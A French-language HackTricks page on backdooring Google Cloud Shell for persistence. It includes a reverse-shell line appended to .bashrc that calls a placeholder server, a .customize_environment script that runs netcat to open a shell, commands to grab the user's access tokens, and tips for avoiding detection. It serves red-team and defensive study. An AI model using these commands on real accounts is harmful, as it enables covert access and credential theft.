GCP - Cloud Shell Persistence

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks:

Cloud Shell

Pour plus d'informations, consultez:

pageGCP - Cloud Shell Enum

Backdoor Persistante

Google Cloud Shell vous offre un accès en ligne de commande à vos ressources cloud directement depuis votre navigateur sans aucun coût associé.

Vous pouvez accéder à Cloud Shell de Google depuis la console web ou en exécutant gcloud cloud-shell ssh.

Cette console offre des capacités intéressantes pour les attaquants :

  1. Tout utilisateur Google ayant accès à Google Cloud a accès à une instance Cloud Shell entièrement authentifiée (les comptes de service peuvent, même en tant que propriétaires de l'organisation).

  2. Cette instance conservera son répertoire personnel pendant au moins 120 jours en l'absence d'activité.

  3. Il n'y a aucune capacité pour une organisation de surveiller l'activité de cette instance.

Cela signifie essentiellement qu'un attaquant peut placer une porte dérobée dans le répertoire personnel de l'utilisateur et tant que l'utilisateur se connecte au GC Shell tous les 120 jours au moins, la porte dérobée survivra et l'attaquant obtiendra un shell à chaque fois qu'elle sera exécutée simplement en faisant :

echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc

Il y a un autre fichier dans le dossier personnel appelé .customize_environment qui, s'il existe, sera exécuté à chaque fois que l'utilisateur accède au cloud shell (comme dans la technique précédente). Il suffit d'insérer la porte dérobée précédente ou une similaire pour maintenir la persistance aussi longtemps que l'utilisateur utilise "fréquemment" le cloud shell :

#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash

Il est important de noter que la première fois qu'une action nécessitant une authentification est effectuée, une fenêtre d'autorisation contextuelle apparaît dans le navigateur de l'utilisateur. Cette fenêtre doit être acceptée avant que la commande puisse s'exécuter. Si une fenêtre contextuelle inattendue apparaît, cela pourrait éveiller des soupçons et compromettre potentiellement la méthode de persistance utilisée.

Voici la fenêtre contextuelle qui s'affiche lors de l'exécution de gcloud projects list à partir du cloud shell (en tant qu'attaquant) vue dans la session utilisateur du navigateur :

Cependant, si l'utilisateur a activement utilisé le cloudshell, la fenêtre contextuelle ne s'affichera pas et vous pouvez collecter les jetons de l'utilisateur avec :

gcloud auth print-access-token
gcloud auth application-default print-access-token

Comment la connexion SSH est établie

Essentiellement, ces 3 appels API sont utilisés :

Mais vous pouvez trouver plus d'informations sur https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key

Références

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks :

Dernière mise à jour